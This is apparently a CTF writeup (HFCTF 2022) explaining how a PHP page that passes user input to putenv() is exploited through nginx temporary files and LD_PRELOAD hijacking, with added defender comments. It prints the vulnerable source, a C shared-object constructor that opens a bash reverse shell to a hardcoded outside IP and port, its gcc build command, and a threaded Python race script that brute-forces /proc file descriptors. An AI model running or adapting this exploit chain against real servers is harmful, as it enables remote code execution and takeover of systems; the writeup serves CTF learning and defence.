https://blog.csdn.net/qq_45619909/article/details/128946735

考点:nginx临时文件上传+LD_PRELOAD劫持

<?php /* Challenge source (kept as-is for the writeup). Defender note: $_GET["env"] flows unchanged into putenv(), so a client can set any environment variable of this process, and the ternary's else-branch then calls system('echo hfctf2022'), which spawns a child that inherits that environment (this is how the LD_PRELOAD path on this page reaches a new process). In real code: never pass user input to putenv(); allow-list variable names, and keep system() out of request handling. */ (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>

[[HXPCTF 2021 includer’s revenge]] nginx临时文件包含技巧来源

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructor: runs when this shared object is loaded, before main() of the host program,
 * so any process started with LD_PRELOAD pointing at this file executes it.
 * Defender note: this is the payload stage of the writeup. Indicators to alert on: a request
 * setting LD_PRELOAD to a /proc/<pid>/fd/<n> path, and a web-server worker spawning sh/bash with
 * an outbound connection. Mitigation: never let user input reach putenv(), avoid spawning child
 * processes from request handlers, and restrict egress from the web tier.
 */
__attribute__ ((__constructor__)) void preload (void){
  unsetenv("LD_PRELOAD");  /* presumably so the shells started below are not preloaded again (page does not say) */
  system("id");  /* its "uid=..." output is what the race script checks for */
  system("bash -c \"sh -i >& /dev/tcp/148.135.82.190/8888 0>&1\"");  /* reverse shell to the address given on this page */
}

`__attribute__((constructor))` 指在 main 函数之前执行一个函数，便于我们做一些准备工作；即我们定义了一个叫做 preload 的无参数、无返回值的构造函数。使用以下命令编译生成 so 文件

# Builds the constructor above as a position-independent shared object (-shared -fPIC), the form a loader accepts via LD_PRELOAD.
gcc -shared -fPIC hook_exp.c -o hook_exp.so

竞争脚本

import requests
import _thread

# Request body: the compiled hook_exp.so followed by 1 MiB of "A" padding. The page attributes the
# technique to nginx keeping a large body in a temporary file, which the preload() workers then
# reference through /proc/<pid>/fd/<n>; the padding presumably makes the body large enough for that
# (the page does not state the threshold). Defender note: a large GET body to a PHP endpoint that
# accepts none is itself an indicator. The file handle is never closed.
f=open("hook_exp.so",'rb')
data=f.read()+(1024*1024* "A").encode()
url="http://localhost:12333/"

def upload() -> None:
    # Worker 1: keeps re-sending the padded .so as a GET body so a copy is (per the page's mechanism)
    # present in an nginx temporary file while the preload() workers probe. Never returns.
    print("start upload")
    while True:
        requests.get(url+"index.php",data=data)

def preload(fd: int) -> None:
    # Worker 2: for each guessed pid (10-19; presumably nginx worker pids, the page does not say) asks the
    # challenge to putenv LD_PRELOAD=/proc/<pid>/fd/<fd>. Success is recognised by 'uid' in the response,
    # i.e. the output of system("id") from the .so's constructor. Defender note: the detectable artefact
    # is a query string setting LD_PRELOAD to a /proc/*/fd/* path; the fix is to never putenv() user input
    # and not to spawn child processes from the request path.
    while True:
        print("start ld_preload")
        for pid in range(10,20):
            file = f'/proc/{pid}/fd/{fd}'
            # print(url+f"index.php?env=LD_PRELOAD={file}")
            resp = requests.get(url+f"index.php?env=LD_PRELOAD={file}")
            # print(resp.text)
            if 'uid' in resp.text:
                print("finished")
                exit()

# Start one uploader thread and one prober thread per fd in 1..19. The bare except hides any
# thread-start failure behind a generic message.
try:
    _thread.start_new_thread(upload, ())
    for fd in range(1, 20):
        _thread.start_new_thread(preload,(fd,))
except:
    print("error")

# Busy-wait keeps the main thread alive so the _thread workers keep running (burns a CPU core).
while True:
    pass